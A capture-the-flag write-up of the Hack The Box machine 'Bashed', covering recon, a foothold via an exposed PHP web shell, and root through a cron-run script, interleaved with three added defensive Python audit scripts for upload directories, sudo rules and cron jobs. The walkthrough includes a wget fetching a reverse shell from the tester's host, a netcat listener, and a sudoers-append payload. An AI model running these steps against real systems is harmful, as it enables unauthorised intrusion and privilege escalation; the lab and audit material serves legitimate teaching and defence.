Bashed

This machine features a web application running a php web shell. This is a relatively simple machine w
Recon
Let's run the nmap scan. The ping probes are blocked, so we will have to use the -Pn flag for the nmap scan.
nmap -sS -sV -sC -T4 10.10.10.68
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-12 10:10 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 2.31 seconds
root@kinetic:/oscp/LABs/zerotrust/content/lab/hackthebox/lame/data# ping 10.10.10.68
PING 10.10.10.68 (10.10.10.68) 56(84) bytes of data.
64 bytes from 10.10.10.68: icmp_seq=1 ttl=63 time=12.4 ms
64 bytes from 10.10.10.68: icmp_seq=2 ttl=63 time=15.1 ms
64 bytes from 10.10.10.68: icmp_seq=3 ttl=63 time=13.7 ms
^C
--- 10.10.10.68 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2004ms
rtt min/avg/max/mdev = 12.367/13.722/15.129/1.128 ms
root@kinetic:/oscp/LABs/zerotrust/content/lab/hackthebox/lame/data# nmap -sS -sV -sC -T4 10.10.10.68
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-12 10:12 EST
Nmap scan report for 10.10.10.68
Host is up (0.016s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.34 seconds
Notes:
- The web server is Apache httpd 2.4.18 with an (Ubuntu) banner, so we are most likely dealing with a Linux machine.
- No other port is open, so our only way in is going to be through the web application.
Enumeration
Since there is a web server running, let's enumerate its directories.
# gobuster dir -u http://10.10.10.68 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.68
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2020/12/12 10:16:06 Starting gobuster
===============================================================
/images (Status: 301)
/uploads (Status: 301)
/php (Status: 301)
/css (Status: 301)
/dev (Status: 301)
/js (Status: 301)
/config.php (Status: 200)
/fonts (Status: 301)
/server-status (Status: 403)
===============================================================
2020/12/12 10:32:04 Finished
===============================================================
Notes:
- Two directories stand out: uploads and dev.
- Open a browser on your machine and visit both uploads and dev.
Web enumeration:
- The uploads directory does not show us anything.
- The dev directory hosts a running web shell, and we can run commands as www-data.
- The uploads directory is writable by www-data, so we can upload a PHP reverse shell there.
Exploit
On the web shell, let's upload a PHP reverse shell script so we can get a regular shell back -
www-data@bashed:/var/www/html# cd uploads
www-data@bashed:/var/www/html/uploads# ls
index.html
www-data@bashed:/var/www/html/uploads# wget http://10.10.14.25:8000/shell.php
--2020-12-12 15:48:48--  http://10.10.14.25:8000/shell.php
Connecting to 10.10.14.25:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5493 (5.4K) [application/octet-stream]
Saving to: 'shell.php'

     0K .....                                                 100% 1.27M=0.004s

2020-12-12 15:48:48 (1.27 MB/s) - 'shell.php' saved [5493/5493]
Now start your local listener and visit http://10.10.10.68/uploads/shell.php; you will get the shell!
eneloop@kinetic:/dev/shm$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.68] 59136
Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 15:50:16 up 5 min,  0 users,  load average: 0.00, 0.07, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@bashed:/$ ls -l
total 80

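From the defender's side, the foothold above depended on two conditions: an upload directory the web server user can write to, and PHP content sitting where Apache will execute it. The following Python audit script is an added example, not part of the original writeup or of the box; it walks an upload directory, flags PHP-executable extensions and PHP open tags hidden in other file types, and reports whether the directory is writable by group or world. The sample directory layout and file contents are constructed for the demonstration, and the extension list is an assumption to be matched against the real Apache handler configuration.

```python
import os
import re
import stat
import tempfile

# Extensions that Apache with mod_php will typically hand to the PHP engine
# (assumed list; check your own AddHandler / FilesMatch configuration).
PHP_EXTENSIONS = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar"}

# Opening tags the PHP interpreter honours; a renamed upload that still
# contains one of these is worth a look even if the extension looks harmless.
# "<?xml" deliberately does not match.
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def directory_writable_by_others(path):
    """True if group or world can write into the directory (e.g. a 0777 uploads dir)."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def scan_uploads(root, head_bytes=4096):
    """Walk an upload directory and return [(relative_path, reason), ...]."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            ext = os.path.splitext(name)[1].lower()
            if ext in PHP_EXTENSIONS:
                findings.append((rel, "PHP-executable extension in upload directory"))
                continue
            # Only the head of the file is inspected; PHP tags in uploads sit near the start
            with open(full, "rb") as fh:
                head = fh.read(head_bytes)
            if PHP_OPEN_TAG.search(head):
                findings.append((rel, "PHP open tag inside a non-PHP file"))
    return findings


def build_sample_upload_dir():
    """Constructed sample mirroring /var/www/html/uploads from the writeup (placeholder contents)."""
    root = tempfile.mkdtemp(prefix="uploads-")
    samples = {
        "index.html": b"<html><body>uploads</body></html>\n",
        "shell.php": b"<?php /* constructed placeholder; not a real shell */ ?>\n",
        "notes.txt": b"release notes\n<?php echo 'constructed'; ?>\n",
        "logo.png": b"\x89PNG\r\n\x1a\n",
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(body)
    os.chmod(root, 0o777)  # reproduce the writable-by-www-data condition
    return root


if __name__ == "__main__":
    sample = build_sample_upload_dir()
    print("writable by others:", directory_writable_by_others(sample))
    for rel, reason in scan_uploads(sample):
        print(f"{rel}: {reason}")
```

Scanning is a detective control; the preventive fix is to make the upload directory non-executable regardless of what lands in it (for Apache with mod_php, `php_admin_flag engine Off` or `RemoveHandler .php` inside a `<Directory>` block for uploads) and to keep the directory owned by a user other than www-data.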
Post-exploit/Privesc
Now you can use the same technique as above to upload linpeas or another local enumeration script and gather more information, so we can attempt lateral or vertical privilege escalation.
Here are the important findings you will notice in the output from the server -
[+] All users
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 bin:x:2:2:bin:/bin:/usr/sbin/nologin
 sys:x:3:3:sys:/dev:/usr/sbin/nologin
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/usr/sbin/nologin
 man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
 lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
 mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
 news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
 uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
 proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
 www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
 backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
 list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
 irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
 nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
 systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
 systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
 systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
 systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
 syslog:x:104:108::/home/syslog:/bin/false
 _apt:x:105:65534::/nonexistent:/bin/false
 messagebus:x:106:110::/var/run/dbus:/bin/false
 uuidd:x:107:111::/run/uuidd:/bin/false
 arrexel:x:1000:1000:arrexel,,,:/home/arrexel:/bin/bash
 scriptmanager:x:1001:1001:,,,:/home/scriptmanager:/bin/bash

[+] Kernel
 Linux version 4.4.0-62-generic (buildd@lcy01-30) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017
[+] Hostname
 bashed
[+] Operating System
 Ubuntu 16.04.2 LTS \n \l

User www-data may run the following commands on bashed:
 (scriptmanager : scriptmanager) NOPASSWD: ALL

[+] All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=1000(arrexel) gid=1000(arrexel) groups=1000(arrexel),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)

/var/lib/php/sessions

[+] Readable *_history, .sudo_as_admin_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .gitconfig, .git-credentials, .git, .svn, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#read-sensitive-data
-rw-r--r-- 1 root root 2188 Aug 31 2015 /etc/bash.bashrc
-rw-r--r-- 1 root root 3771 Aug 31 2015 /etc/skel/.bashrc
-rw-r--r-- 1 root root 655 Jun 24 2016 /etc/skel/.profile
-rw-r--r-- 1 arrexel arrexel 3786 Dec 4 2017 /home/arrexel/.bashrc
-rw-r--r-- 1 arrexel arrexel 655 Dec 4 2017 /home/arrexel/.profile
-rw-r--r-- 1 arrexel arrexel 0 Dec 4 2017 /home/arrexel/.sudo_as_admin_successful
-rw-r--r-- 1 scriptmanager scriptmanager 3786 Dec 4 2017 /home/scriptmanager/.bashrc
-rw-r--r-- 1 root root 3106 Oct 22 2015 /usr/share/base-files/dot.bashrc
-rw-r--r-- 1 root root 870 Jul 2 2015 /usr/share/doc/adduser/examples/adduser.local.conf.examples/bash.bashrc
-rw-r--r-- 1 root root 1865 Jul 2 2015 /usr/share/doc/adduser/examples/adduser.local.conf.examples/skel/dot.bashrc

[+] .sh files in path
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh

[+] Unexpected folders in root
/scripts
/lost+found

Files with capabilities:
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
Notes:
- Here we find something very interesting: we can run any command as the scriptmanager user!
- Also, there is a /scripts directory owned by scriptmanager in the root of the filesystem, which is very unusual. Let's explore further.
www-data@bashed:/home/scriptmanager$ ls -l /scripts/
ls: cannot access '/scripts/test.py': Permission denied
ls: cannot access '/scripts/test.txt': Permission denied
total 0
-????????? ? ? ? ? ? test.py
-????????? ? ? ? ? ? test.txt
www-data@bashed:/home/scriptmanager$ sudo -u scriptmanager 'date'
Sat Dec 12 16:28:11 PST 2020
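The rule that makes this step possible is easy to spot in `sudo -l` output once you know what to look for: a service account (no login shell) holding a sudo rule at all, NOPASSWD, an unrestricted command list, and the runas target. The script below is an added example, not part of the original writeup; it parses `sudo -l` output and an /etc/passwd excerpt and reports rules a defender would want to review. The `sudo -l` text and passwd lines are constructed to carry the exact rule and accounts shown in the enumeration above (the Defaults block is a typical Ubuntu default and is an assumption).

```python
import re

# Constructed excerpt in the shape of `sudo -l` output, carrying the rule
# the enumeration above reported.
SUDO_L_OUTPUT = """\
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
"""

# Constructed /etc/passwd excerpt (entries copied from the enumeration output above).
PASSWD_EXCERPT = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
arrexel:x:1000:1000:arrexel,,,:/home/arrexel:/bin/bash
scriptmanager:x:1001:1001:,,,:/home/scriptmanager:/bin/bash
"""

USER_HEADER = re.compile(r"^User (\S+) may run the following commands")
# Rule line shape: (runas_user : runas_group) [TAG: TAG: ...] command
RULE_LINE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.+)$")
NO_LOGIN_SHELLS = ("/usr/sbin/nologin", "/sbin/nologin", "/bin/false")


def parse_passwd(text):
    """Map user name -> {'uid': int, 'shell': str} from passwd-format text."""
    users = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        name, _pw, uid, _gid, _gecos, _home, shell = line.split(":")
        users[name] = {"uid": int(uid), "shell": shell}
    return users


def parse_sudo_l(text):
    """Yield (user, runas_user, tags, command) for each rule in `sudo -l` output."""
    user = None
    for line in text.splitlines():
        header = USER_HEADER.match(line)
        if header:
            user = header.group(1)
            continue
        rule = RULE_LINE.match(line)
        if rule and user:
            runas_user = rule.group("runas").split(":")[0].strip() or user
            tags = {t.strip() for t in rule.group("tags").split(":") if t.strip()}
            yield user, runas_user, tags, rule.group("cmd").strip()


def audit_sudo_rules(sudo_text, passwd_text):
    """Return a list of dicts describing rules that deserve review, with the reasons."""
    users = parse_passwd(passwd_text)
    findings = []
    for user, runas_user, tags, cmd in parse_sudo_l(sudo_text):
        reasons = []
        shell = users.get(user, {}).get("shell", "")
        if shell in NO_LOGIN_SHELLS:
            reasons.append("service account (no login shell) holds a sudo rule")
        if "NOPASSWD" in tags:
            reasons.append("no password required")
        if cmd == "ALL":
            reasons.append("unrestricted command list (ALL)")
        if runas_user in ("ALL", "root"):
            reasons.append("can run as root")
        if reasons:
            findings.append({"user": user, "runas": runas_user, "cmd": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_sudo_rules(SUDO_L_OUTPUT, PASSWD_EXCERPT):
        print(f"{f['user']} -> {f['runas']}: {f['cmd']}  [{'; '.join(f['reasons'])}]")
```

Run on a real host, feed it `sudo -l -U <user>` output (run as root) and the host's /etc/passwd; any rule granted to an account whose shell is nologin is a finding on its own, because a web server user has no legitimate reason to hold sudo rights.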
Since we can run any command as scriptmanager, and scriptmanager is a regular user with a login shell, we can use that to get a shell as scriptmanager -
www-data@bashed:/home/scriptmanager$ sudo -u scriptmanager bash -i
Now, let's check out the test.py and test.txt files we noticed earlier -
scriptmanager@bashed:~$ cd /scripts
scriptmanager@bashed:/scripts$ ls -l
total 8
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py
-rw-r--r-- 1 root root 12 Dec 12 16:28 test.txt
scriptmanager@bashed:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
scriptmanager@bashed:/scripts$ date
Sat Dec 12 16:29:04 PST 2020
scriptmanager@bashed:/scripts$ ls -l
total 8
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py
-rw-r--r-- 1 root root 12 Dec 12 16:29 test.txt
scriptmanager@bashed:/scripts$

Notes:
- As you can see, test.txt is rewritten every minute and is owned by root.
- test.py is the script that writes this file, and it is most likely being run as root. This is a juicy target!
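The root cause here is a scheduled job running as root whose script (and whose parent directory) belongs to an unprivileged user. The following Python audit is an added example, not part of the original writeup; it parses system crontab lines, resolves the script each job executes (following a leading `cd DIR &&`), and flags jobs where the executing user is root but the script or its directory is owned by someone else or is group/world writable. The crontab excerpt is constructed: the writeup never shows the real entry and only infers one from test.txt being rewritten every minute, so the job line is an assumption that reproduces that behaviour. The ownership table stands in for os.stat() so the example runs offline; owner and mode of /scripts/test.py match the `ls -l` output above.

```python
import os
import re
import shlex
import stat

# Constructed /etc/crontab excerpt (the first job line is an assumption; see lead-in).
CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
* * * * * root cd /scripts && python test.py
17 * * * * root cd / && run-parts --report /etc/cron.hourly
"""

# Constructed ownership table: path -> (owner, permission bits), standing in for os.stat().
FILE_INFO = {
    "/scripts": ("scriptmanager", 0o755),
    "/scripts/test.py": ("scriptmanager", 0o644),
    "/etc/cron.hourly": ("root", 0o755),
}

SCRIPT_SUFFIXES = (".py", ".sh", ".pl", ".rb")


def command_paths(command):
    """Absolute paths a cron command references; a leading `cd DIR &&` sets the base for relative scripts."""
    cwd = "/"
    paths = []
    for segment in re.split(r"&&|\|\||;", command):
        tokens = shlex.split(segment)
        if not tokens:
            continue
        if tokens[0] == "cd" and len(tokens) > 1:
            cwd = tokens[1]
            continue
        for tok in tokens:
            if tok.startswith("/"):
                paths.append(os.path.normpath(tok))
            elif tok.endswith(SCRIPT_SUFFIXES):
                paths.append(os.path.normpath(os.path.join(cwd, tok)))
    return paths


def audit_cron(cron_text, file_info):
    """Return [(schedule, user, path, reasons)] for jobs whose script a non-root user controls."""
    findings = []
    for raw in cron_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("@") or "=" in line.split()[0]:
            continue  # blank, comment, @reboot-style entry (not handled here), or VAR=value line
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue  # malformed system-crontab line
        schedule, user, command = " ".join(fields[:5]), fields[5], fields[6]
        for path in command_paths(command):
            info = file_info.get(path)
            if info is None:
                continue  # not in the table: nothing known about it
            owner, mode = info
            reasons = []
            if user == "root" and owner != "root":
                reasons.append(f"runs as root but owned by {owner}")
            if mode & (stat.S_IWGRP | stat.S_IWOTH):
                reasons.append("group/world writable")
            parent = file_info.get(os.path.dirname(path))
            if parent and user == "root" and parent[0] != "root":
                reasons.append(f"parent directory owned by {parent[0]}")
            if reasons:
                findings.append((schedule, user, path, reasons))
    return findings


def live_file_info(paths):
    """Build the same ownership table from the real filesystem (Unix only; not used by the sample run)."""
    import pwd
    table = {}
    for p in paths:
        st = os.stat(p)
        table[p] = (pwd.getpwuid(st.st_uid).pw_name, stat.S_IMODE(st.st_mode))
    return table


if __name__ == "__main__":
    for schedule, user, path, reasons in audit_cron(CRONTAB, FILE_INFO):
        print(f"[{schedule}] {user}: {path} -> {'; '.join(reasons)}")
```

On a real host, pass the contents of /etc/crontab and /etc/cron.d/* together with `live_file_info(...)` over the paths `command_paths` reports. The parent-directory check matters as much as the file check: even a root-owned script can be replaced if the directory holding it belongs to another user.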
We can manipulate the test.py script to add our user to sudoers
cat test.py
f = open("/etc/sudoers", "a")
f.write("scriptmanager ALL=(ALL) NOPASSWD: ALL")
f.close
Note:
- Note the "NOPASSWD", which means we can sudo without knowing the password for scriptmanager or any other user!
Now, overwrite the script and wait a minute for it to run. After this, you can simply run sudo su - to become root, as below -
scriptmanager@bashed:/scripts$ echo 'f = open("/etc/sudoers", "a")
> f.write("scriptmanager ALL=(ALL) NOPASSWD: ALL")
> f.close'>test.py
scriptmanager@bashed:/scripts$ date
Sat Dec 12 16:56:36 PST 2020
scriptmanager@bashed:/scripts$ ls -ltr
total 12
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 12 16:32 test.py-orig
-rw-r--r-- 1 root root 565 Dec 12 16:36 test.txt
-rw-r--r-- 1 scriptmanager scriptmanager 87 Dec 12 16:56 test.py
scriptmanager@bashed:/scripts$ date
Sat Dec 12 16:56:47 PST 2020
scriptmanager@bashed:/scripts$ date
Sat Dec 12 16:56:51 PST 2020
scriptmanager@bashed:/scripts$ date
Sat Dec 12 16:57:03 PST 2020
scriptmanager@bashed:/scripts$ sudo su -
root@bashed:~# ls
root.txt
root@bashed:~# cat root.txt
<Flag goes here>

Additional Note: After watching ippsec's video once I was done, I realized that I could have simply copied the python reverse shell script over the test.py and that could get me a shell as well.